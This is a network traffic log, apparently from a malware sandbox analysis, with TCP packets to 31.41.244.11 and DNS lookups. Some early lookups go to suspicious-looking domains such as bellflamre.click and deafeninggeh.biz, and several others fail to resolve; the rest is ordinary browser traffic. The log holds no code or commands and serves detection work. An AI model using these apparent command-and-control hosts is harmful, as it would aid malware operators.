Dec 14, 2024 12:56:44.846204042 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.846225023 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.846268892 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.846268892 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.847227097 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.847320080 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.847335100 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.847429037 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.848212004 CET	80	49860	31.41.244.11	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 14, 2024 12:56:11.925524950 CET	192.168.2.4	1.1.1.1	0x9c91	Standard query (0)	bellflamre.click	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:56:15.400162935 CET	192.168.2.4	1.1.1.1	0xb70	Standard query (0)	immureprech.biz	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:56:18.712770939 CET	192.168.2.4	1.1.1.1	0x9690	Standard query (0)	deafeninggeh.biz	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:56:21.883337021 CET	192.168.2.4	1.1.1.1	0xb2af	Standard query (0)	effecterectz.xyz	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:56:22.152755976 CET	192.168.2.4	1.1.1.1	0x531f	Standard query (0)	diffuculttan.xyz	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:56:22.376420975 CET	192.168.2.4	1.1.1.1	0xc6d5	Standard query (0)	debonairnukk.xyz	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:56:22.605132103 CET	192.168.2.4	1.1.1.1	0x6017	Standard query (0)	wrathful-jammy.cyou	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:56:22.840894938 CET	192.168.2.4	1.1.1.1	0x6d9c	Standard query (0)	awake-weaves.cyou	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:56:23.129640102 CET	192.168.2.4	1.1.1.1	0xc75d	Standard query (0)	sordid-snaked.cyou	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:56:23.404894114 CET	192.168.2.4	1.1.1.1	0x5e6b	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:56:26.290703058 CET	192.168.2.4	1.1.1.1	0xec1c	Standard query (0)	prod.classify-client.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:56:26.439759970 CET	192.168.2.4	1.1.1.1	0x4b52	Standard query (0)	prod.classify-client.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Dec 14, 2024 12:56:31.947726965 CET	192.168.2.4	1.1.1.1	0x9010	Standard query (0)	youtube.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:56:32.087507963 CET	192.168.2.4	1.1.1.1	0x88c8	Standard query (0)	youtube.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:56:32.202689886 CET	192.168.2.4	1.1.1.1	0x3972	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:56:32.226908922 CET	192.168.2.4	1.1.1.1	0xc2	Standard query (0)	youtube.com	28	IN (0x0001)	false
Dec 14, 2024 12:56:32.368253946 CET	192.168.2.4	1.1.1.1	0xe84	Standard query (0)	prod.detectportal.prod.cloudops.mozgcp.net	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:56:32.473543882 CET	192.168.2.4	1.1.1.1	0xa7e6	Standard query (0)	contile.services.mozilla.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:56:32.506695032 CET	192.168.2.4	1.1.1.1	0x9a61	Standard query (0)	prod.detectportal.prod.cloudops.mozgcp.net	28	IN (0x0001)	false
Dec 14, 2024 12:56:32.528624058 CET	192.168.2.4	1.1.1.1	0x7d2f	Standard query (0)	spocs.getpocket.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:56:40.471716881 CET	192.168.2.4	1.1.1.1	0xb951	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:56:40.471837997 CET	192.168.2.4	1.1.1.1	0xcb6d	Standard query (0)	www.google.com	65	IN (0x0001)	false
Dec 14, 2024 12:56:51.118773937 CET	192.168.2.4	1.1.1.1	0x50fc	Standard query (0)	prod.classify-client.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Dec 14, 2024 12:56:52.223831892 CET	192.168.2.4	1.1.1.1	0x9224	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:56:54.521244049 CET	192.168.2.4	1.1.1.1	0xdab8	Standard query (0)	example.org	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:56:54.659804106 CET	192.168.2.4	1.1.1.1	0x94d2	Standard query (0)	ipv4only.arpa	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:56:55.829226017 CET	192.168.2.4	1.1.1.1	0xfc95	Standard query (0)	contile.services.mozilla.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:56:55.830116987 CET	192.168.2.4	1.1.1.1	0x62cc	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:56:55.854266882 CET	192.168.2.4	1.1.1.1	0x141f	Standard query (0)	prod.ads.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:56:55.968872070 CET	192.168.2.4	1.1.1.1	0xfa5b	Standard query (0)	contile.services.mozilla.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:56:55.985707045 CET	192.168.2.4	1.1.1.1	0xdb35	Standard query (0)	prod.balrog.prod.cloudops.mozgcp.net	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:56:55.995131016 CET	192.168.2.4	1.1.1.1	0xeada	Standard query (0)	prod.ads.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Dec 14, 2024 12:56:56.107656002 CET	192.168.2.4	1.1.1.1	0xc6b6	Standard query (0)	contile.services.mozilla.com	28	IN (0x0001)	false
Dec 14, 2024 12:56:56.126336098 CET	192.168.2.4	1.1.1.1	0xdbc0	Standard query (0)	prod.balrog.prod.cloudops.mozgcp.net	28	IN (0x0001)	false
Dec 14, 2024 12:56:56.354340076 CET	192.168.2.4	1.1.1.1	0x25e9	Standard query (0)	content-signature-2.cdn.mozilla.net	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:56:56.493009090 CET	192.168.2.4	1.1.1.1	0xe373	Standard query (0)	prod.content-signature-chains.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:56:56.631671906 CET	192.168.2.4	1.1.1.1	0x1ba	Standard query (0)	prod.content-signature-chains.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Dec 14, 2024 12:57:03.843282938 CET	192.168.2.4	1.1.1.1	0xc088	Standard query (0)	www.youtube.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:03.843558073 CET	192.168.2.4	1.1.1.1	0xcbb7	Standard query (0)	www.facebook.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:03.843789101 CET	192.168.2.4	1.1.1.1	0x13fc	Standard query (0)	www.wikipedia.org	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:04.511519909 CET	192.168.2.4	1.1.1.1	0x1886	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:04.712896109 CET	192.168.2.4	1.1.1.1	0xa30b	Standard query (0)	youtube-ui.l.google.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:04.713097095 CET	192.168.2.4	1.1.1.1	0x1b0f	Standard query (0)	dyna.wikimedia.org	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:04.713262081 CET	192.168.2.4	1.1.1.1	0x96ce	Standard query (0)	star-mini.c10r.facebook.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:04.829015017 CET	192.168.2.4	1.1.1.1	0x998e	Standard query (0)	shavar.services.mozilla.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:04.853203058 CET	192.168.2.4	1.1.1.1	0x3a2d	Standard query (0)	star-mini.c10r.facebook.com	28	IN (0x0001)	false
Dec 14, 2024 12:57:04.853745937 CET	192.168.2.4	1.1.1.1	0xc2e1	Standard query (0)	youtube-ui.l.google.com	28	IN (0x0001)	false
Dec 14, 2024 12:57:04.933494091 CET	192.168.2.4	1.1.1.1	0x600	Standard query (0)	dyna.wikimedia.org	28	IN (0x0001)	false
Dec 14, 2024 12:57:04.995281935 CET	192.168.2.4	1.1.1.1	0x94b8	Standard query (0)	www.reddit.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:04.995672941 CET	192.168.2.4	1.1.1.1	0x73b1	Standard query (0)	twitter.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:05.143167973 CET	192.168.2.4	1.1.1.1	0x7994	Standard query (0)	reddit.map.fastly.net	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:05.233628035 CET	192.168.2.4	1.1.1.1	0xb509	Standard query (0)	twitter.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:05.396697044 CET	192.168.2.4	1.1.1.1	0x5b98	Standard query (0)	reddit.map.fastly.net	28	IN (0x0001)	false
Dec 14, 2024 12:57:05.450122118 CET	192.168.2.4	1.1.1.1	0xf525	Standard query (0)	twitter.com	28	IN (0x0001)	false
Dec 14, 2024 12:57:21.693455935 CET	192.168.2.4	1.1.1.1	0xa035	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:21.693579912 CET	192.168.2.4	1.1.1.1	0xdfdf	Standard query (0)	www.google.com	65	IN (0x0001)	false
Dec 14, 2024 12:57:26.360095024 CET	192.168.2.4	1.1.1.1	0x651a	Standard query (0)	support.mozilla.org	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:26.498603106 CET	192.168.2.4	1.1.1.1	0xaf40	Standard query (0)	us-west1.prod.sumo.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:26.638808012 CET	192.168.2.4	1.1.1.1	0x971a	Standard query (0)	us-west1.prod.sumo.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Dec 14, 2024 12:57:28.361876965 CET	192.168.2.4	1.1.1.1	0x8e91	Standard query (0)	apis.google.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:28.362015009 CET	192.168.2.4	1.1.1.1	0x5147	Standard query (0)	apis.google.com	65	IN (0x0001)	false
Dec 14, 2024 12:57:28.474128962 CET	192.168.2.4	1.1.1.1	0x10c2	Standard query (0)	firefox.settings.services.mozilla.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:28.596635103 CET	192.168.2.4	1.1.1.1	0xd61e	Standard query (0)	push.services.mozilla.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:28.599613905 CET	192.168.2.4	1.1.1.1	0x8078	Standard query (0)	prod.balrog.prod.cloudops.mozgcp.net	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:28.613600969 CET	192.168.2.4	1.1.1.1	0x9b91	Standard query (0)	prod.remote-settings.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:28.740668058 CET	192.168.2.4	1.1.1.1	0xa0dd	Standard query (0)	prod.balrog.prod.cloudops.mozgcp.net	28	IN (0x0001)	false
Dec 14, 2024 12:57:28.744208097 CET	192.168.2.4	1.1.1.1	0x25e6	Standard query (0)	telemetry-incoming.r53-2.services.mozilla.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:28.762264967 CET	192.168.2.4	1.1.1.1	0x16e9	Standard query (0)	prod.remote-settings.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Dec 14, 2024 12:57:28.842652082 CET	192.168.2.4	1.1.1.1	0x2c5f	Standard query (0)	services.addons.mozilla.org	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:28.882231951 CET	192.168.2.4	1.1.1.1	0x7744	Standard query (0)	telemetry-incoming.r53-2.services.mozilla.com	28	IN (0x0001)	false
Dec 14, 2024 12:57:28.897068024 CET	192.168.2.4	1.1.1.1	0xc3dd	Standard query (0)	push.services.mozilla.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:29.036102057 CET	192.168.2.4	1.1.1.1	0x1495	Standard query (0)	push.services.mozilla.com	28	IN (0x0001)	false
Dec 14, 2024 12:57:29.074321032 CET	192.168.2.4	1.1.1.1	0xbad9	Standard query (0)	services.addons.mozilla.org	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:29.212506056 CET	192.168.2.4	1.1.1.1	0x203e	Standard query (0)	services.addons.mozilla.org	28	IN (0x0001)	false
Dec 14, 2024 12:57:35.353528976 CET	192.168.2.4	1.1.1.1	0xf402	Standard query (0)	push.services.mozilla.com	28	IN (0x0001)	false
Dec 14, 2024 12:57:36.589443922 CET	192.168.2.4	1.1.1.1	0x98eb	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:46.888379097 CET	192.168.2.4	1.1.1.1	0xdf50	Standard query (0)	push.services.mozilla.com	28	IN (0x0001)	false
Dec 14, 2024 12:57:46.898257017 CET	192.168.2.4	1.1.1.1	0xe713	Standard query (0)	telemetry-incoming.r53-2.services.mozilla.com	28	IN (0x0001)	false
Dec 14, 2024 12:57:48.172532082 CET	192.168.2.4	1.1.1.1	0x9ff6	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:58:08.184041023 CET	192.168.2.4	1.1.1.1	0xcb0c	Standard query (0)	push.services.mozilla.com	28	IN (0x0001)	false
Dec 14, 2024 12:58:49.540468931 CET	192.168.2.4	1.1.1.1	0x72cf	Standard query (0)	push.services.mozilla.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:58:49.683330059 CET	192.168.2.4	1.1.1.1	0x2526	Standard query (0)	push.services.mozilla.com	28	IN (0x0001)	false
Dec 14, 2024 12:58:50.912448883 CET	192.168.2.4	1.1.1.1	0xa957	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:59:48.724179029 CET	192.168.2.4	1.1.1.1	0xa030	Standard query (0)	telemetry-incoming.r53-2.services.mozilla.com	28	IN (0x0001)	false
Dec 14, 2024 12:59:49.955692053 CET	192.168.2.4	1.1.1.1	0xc611	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:00:10.932600975 CET	192.168.2.4	1.1.1.1	0x25ed	Standard query (0)	push.services.mozilla.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:00:11.074251890 CET	192.168.2.4	1.1.1.1	0x60e7	Standard query (0)	push.services.mozilla.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:00:11.213681936 CET	192.168.2.4	1.1.1.1	0xd755	Standard query (0)	push.services.mozilla.com	28	IN (0x0001)	false
Dec 14, 2024 13:00:46.449013948 CET	192.168.2.4	1.1.1.1	0xe638	Standard query (0)	prod.classify-client.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Dec 14, 2024 13:00:46.615081072 CET	192.168.2.4	1.1.1.1	0xc029	Standard query (0)	youtube.com	28	IN (0x0001)	false
Dec 14, 2024 13:00:46.873194933 CET	192.168.2.4	1.1.1.1	0x7dae	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:00:46.943933964 CET	192.168.2.4	1.1.1.1	0xb350	Standard query (0)	contile.services.mozilla.com	28	IN (0x0001)	false
Dec 14, 2024 13:00:46.953052044 CET	192.168.2.4	1.1.1.1	0x1b	Standard query (0)	spocs.getpocket.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:00:46.984054089 CET	192.168.2.4	1.1.1.1	0xd485	Standard query (0)	prod.content-signature-chains.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:00:46.987615108 CET	192.168.2.4	1.1.1.1	0x2488	Standard query (0)	shavar.services.mozilla.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:00:46.995102882 CET	192.168.2.4	1.1.1.1	0x4cdd	Standard query (0)	push.services.mozilla.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:00:47.007661104 CET	192.168.2.4	1.1.1.1	0xf5bf	Standard query (0)	firefox.settings.services.mozilla.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:00:47.093799114 CET	192.168.2.4	1.1.1.1	0x6d4e	Standard query (0)	prod.ads.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Dec 14, 2024 13:00:47.119079113 CET	192.168.2.4	1.1.1.1	0x2b46	Standard query (0)	prod.balrog.prod.cloudops.mozgcp.net	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:00:47.134098053 CET	192.168.2.4	1.1.1.1	0xb54f	Standard query (0)	push.services.mozilla.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:00:47.233989954 CET	192.168.2.4	1.1.1.1	0x7f4c	Standard query (0)	prod.remote-settings.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:00:47.258431911 CET	192.168.2.4	1.1.1.1	0x7e7e	Standard query (0)	prod.balrog.prod.cloudops.mozgcp.net	28	IN (0x0001)	false
Dec 14, 2024 13:00:47.275734901 CET	192.168.2.4	1.1.1.1	0xe676	Standard query (0)	push.services.mozilla.com	28	IN (0x0001)	false
Dec 14, 2024 13:00:47.374684095 CET	192.168.2.4	1.1.1.1	0xf2b5	Standard query (0)	prod.remote-settings.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Dec 14, 2024 13:00:48.070477009 CET	192.168.2.4	1.1.1.1	0xc4c7	Standard query (0)	telemetry-incoming.r53-2.services.mozilla.com	28	IN (0x0001)	false
Dec 14, 2024 13:00:48.226516962 CET	192.168.2.4	1.1.1.1	0xf126	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:00:49.893026114 CET	192.168.2.4	1.1.1.1	0x1415	Standard query (0)	www.facebook.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:00:49.893068075 CET	192.168.2.4	1.1.1.1	0x4b18	Standard query (0)	www.wikipedia.org	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:00:49.893345118 CET	192.168.2.4	1.1.1.1	0xdd5d	Standard query (0)	youtube-ui.l.google.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:00:50.031557083 CET	192.168.2.4	1.1.1.1	0xaf78	Standard query (0)	www.reddit.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:00:50.033332109 CET	192.168.2.4	1.1.1.1	0x39f3	Standard query (0)	star-mini.c10r.facebook.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:00:50.036367893 CET	192.168.2.4	1.1.1.1	0xbae8	Standard query (0)	youtube-ui.l.google.com	28	IN (0x0001)	false
Dec 14, 2024 13:00:50.172199965 CET	192.168.2.4	1.1.1.1	0x7783	Standard query (0)	star-mini.c10r.facebook.com	28	IN (0x0001)	false
Dec 14, 2024 13:00:50.175885916 CET	192.168.2.4	1.1.1.1	0x41fa	Standard query (0)	twitter.com	28	IN (0x0001)	false
Dec 14, 2024 13:00:50.717493057 CET	192.168.2.4	1.1.1.1	0x3fec	Standard query (0)	support.mozilla.org	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:00:50.855983973 CET	192.168.2.4	1.1.1.1	0x1491	Standard query (0)	us-west1.prod.sumo.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Dec 14, 2024 13:00:53.699151039 CET	192.168.2.4	1.1.1.1	0x229f	Standard query (0)	push.services.mozilla.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:00:53.840400934 CET	192.168.2.4	1.1.1.1	0xfbc6	Standard query (0)	push.services.mozilla.com	28	IN (0x0001)	false
Dec 14, 2024 13:01:13.455339909 CET	192.168.2.4	1.1.1.1	0x1ed8	Standard query (0)	contile.services.mozilla.com	28	IN (0x0001)	false
Dec 14, 2024 13:01:13.487658978 CET	192.168.2.4	1.1.1.1	0x8340	Standard query (0)	prod.ads.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Dec 14, 2024 13:01:13.489393950 CET	192.168.2.4	1.1.1.1	0xa8be	Standard query (0)	prod.balrog.prod.cloudops.mozgcp.net	28	IN (0x0001)	false
Dec 14, 2024 13:01:13.567159891 CET	192.168.2.4	1.1.1.1	0x3f56	Standard query (0)	content-signature-2.cdn.mozilla.net	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:01:13.616220951 CET	192.168.2.4	1.1.1.1	0x87ab	Standard query (0)	prod.classify-client.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Dec 14, 2024 13:01:13.691301107 CET	192.168.2.4	1.1.1.1	0xde5e	Standard query (0)	push.services.mozilla.com	28	IN (0x0001)	false
Dec 14, 2024 13:01:13.793409109 CET	192.168.2.4	1.1.1.1	0x7ed6	Standard query (0)	telemetry-incoming.r53-2.services.mozilla.com	28	IN (0x0001)	false
Dec 14, 2024 13:01:13.827708960 CET	192.168.2.4	1.1.1.1	0xce37	Standard query (0)	prod.remote-settings.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Dec 14, 2024 13:01:13.862143993 CET	192.168.2.4	1.1.1.1	0x3f56	Standard query (0)	content-signature-2.cdn.mozilla.net	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:01:16.878006935 CET	192.168.2.4	1.1.1.1	0xe3d0	Standard query (0)	star-mini.c10r.facebook.com	28	IN (0x0001)	false
Dec 14, 2024 13:01:16.878654957 CET	192.168.2.4	1.1.1.1	0xbbb7	Standard query (0)	twitter.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:01:17.018079042 CET	192.168.2.4	1.1.1.1	0xb184	Standard query (0)	twitter.com	28	IN (0x0001)	false
Dec 14, 2024 13:01:17.159677029 CET	192.168.2.4	1.1.1.1	0xead5	Standard query (0)	us-west1.prod.sumo.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Dec 14, 2024 13:01:20.357176065 CET	192.168.2.4	1.1.1.1	0xc2b3	Standard query (0)	push.services.mozilla.com	28	IN (0x0001)	false
Dec 14, 2024 13:01:31.631289959 CET	192.168.2.4	1.1.1.1	0xabce	Standard query (0)	push.services.mozilla.com	28	IN (0x0001)	false
Dec 14, 2024 13:01:32.858468056 CET	192.168.2.4	1.1.1.1	0x3f35	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:01:43.038988113 CET	192.168.2.4	1.1.1.1	0x88e3	Standard query (0)	services.addons.mozilla.org	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:01:43.178570032 CET	192.168.2.4	1.1.1.1	0x16a9	Standard query (0)	prod.balrog.prod.cloudops.mozgcp.net	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:01:43.316977024 CET	192.168.2.4	1.1.1.1	0x2483	Standard query (0)	prod.balrog.prod.cloudops.mozgcp.net	28	IN (0x0001)	false
Dec 14, 2024 13:01:43.317281961 CET	192.168.2.4	1.1.1.1	0x35c	Standard query (0)	services.addons.mozilla.org	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:01:43.456825018 CET	192.168.2.4	1.1.1.1	0x24e2	Standard query (0)	services.addons.mozilla.org	28	IN (0x0001)	false
Dec 14, 2024 13:01:52.949476957 CET	192.168.2.4	1.1.1.1	0x8ea4	Standard query (0)	push.services.mozilla.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:01:53.091815948 CET	192.168.2.4	1.1.1.1	0x6f26	Standard query (0)	push.services.mozilla.com	28	IN (0x0001)	false
Dec 14, 2024 13:02:08.504235983 CET	192.168.2.4	1.1.1.1	0x9c59	Standard query (0)	push.services.mozilla.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:02:13.750256062 CET	192.168.2.4	1.1.1.1	0x5cd	Standard query (0)	telemetry-incoming.r53-2.services.mozilla.com	28	IN (0x0001)	false
Dec 14, 2024 13:02:34.621433020 CET	192.168.2.4	1.1.1.1	0x17e0	Standard query (0)	push.services.mozilla.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:02:34.765572071 CET	192.168.2.4	1.1.1.1	0xd4a9	Standard query (0)	push.services.mozilla.com	28	IN (0x0001)	false
Dec 14, 2024 13:02:35.986274004 CET	192.168.2.4	1.1.1.1	0x6fa5	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:03:56.164874077 CET	192.168.2.4	1.1.1.1	0x6e18	Standard query (0)	push.services.mozilla.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:03:56.308156967 CET	192.168.2.4	1.1.1.1	0xbdeb	Standard query (0)	push.services.mozilla.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:03:56.448626995 CET	192.168.2.4	1.1.1.1	0x80df	Standard query (0)	push.services.mozilla.com	28	IN (0x0001)	false
Dec 14, 2024 13:03:57.681205034 CET	192.168.2.4	1.1.1.1	0x2cde	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:04:15.168504000 CET	192.168.2.4	1.1.1.1	0x75e	Standard query (0)	telemetry-incoming.r53-2.services.mozilla.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:04:15.309371948 CET	192.168.2.4	1.1.1.1	0x683	Standard query (0)	telemetry-incoming.r53-2.services.mozilla.com	28	IN (0x0001)	false
Dec 14, 2024 13:04:16.421586990 CET	192.168.2.4	1.1.1.1	0x6dfe	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 14, 2024 12:56:12.234108925 CET	1.1.1.1	192.168.2.4	0x9c91	No error (0)	bellflamre.click		104.21.67.145	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:56:12.234108925 CET	1.1.1.1	192.168.2.4	0x9c91	No error (0)	bellflamre.click		172.67.177.87	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:56:15.701905012 CET	1.1.1.1	192.168.2.4	0xb70	No error (0)	immureprech.biz		104.21.22.222	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:56:15.701905012 CET	1.1.1.1	192.168.2.4	0xb70	No error (0)	immureprech.biz		172.67.207.38	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:56:19.017925978 CET	1.1.1.1	192.168.2.4	0x9690	No error (0)	deafeninggeh.biz		104.21.96.1	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:56:19.017925978 CET	1.1.1.1	192.168.2.4	0x9690	No error (0)	deafeninggeh.biz		104.21.32.1	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:56:19.017925978 CET	1.1.1.1	192.168.2.4	0x9690	No error (0)	deafeninggeh.biz		104.21.64.1	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:56:19.017925978 CET	1.1.1.1	192.168.2.4	0x9690	No error (0)	deafeninggeh.biz		104.21.48.1	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:56:19.017925978 CET	1.1.1.1	192.168.2.4	0x9690	No error (0)	deafeninggeh.biz		104.21.16.1	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:56:19.017925978 CET	1.1.1.1	192.168.2.4	0x9690	No error (0)	deafeninggeh.biz		104.21.112.1	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:56:19.017925978 CET	1.1.1.1	192.168.2.4	0x9690	No error (0)	deafeninggeh.biz		104.21.80.1	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:56:22.103477001 CET	1.1.1.1	192.168.2.4	0xb2af	Name error (3)	effecterectz.xyz	none	none	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:56:22.374347925 CET	1.1.1.1	192.168.2.4	0x531f	Name error (3)	diffuculttan.xyz	none	none	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:56:22.602449894 CET	1.1.1.1	192.168.2.4	0xc6d5	Name error (3)	debonairnukk.xyz	none	none	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:56:22.836935043 CET	1.1.1.1	192.168.2.4	0x6017	Name error (3)	wrathful-jammy.cyou	none	none	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:56:23.059382915 CET	1.1.1.1	192.168.2.4	0x6d9c	Name error (3)	awake-weaves.cyou	none	none	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:56:23.353482962 CET	1.1.1.1	192.168.2.4	0xc75d	Name error (3)	sordid-snaked.cyou	none	none	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:56:23.543622017 CET	1.1.1.1	192.168.2.4	0x5e6b	No error (0)	steamcommunity.com		23.55.153.106	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:56:26.286618948 CET	1.1.1.1	192.168.2.4	0xa400	No error (0)	prod.classify-client.prod.webservices.mozgcp.net		35.190.72.216	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:56:26.428291082 CET	1.1.1.1	192.168.2.4	0xec1c	No error (0)	prod.classify-client.prod.webservices.mozgcp.net		35.190.72.216	A (IP address)	IN (0x0001)	false
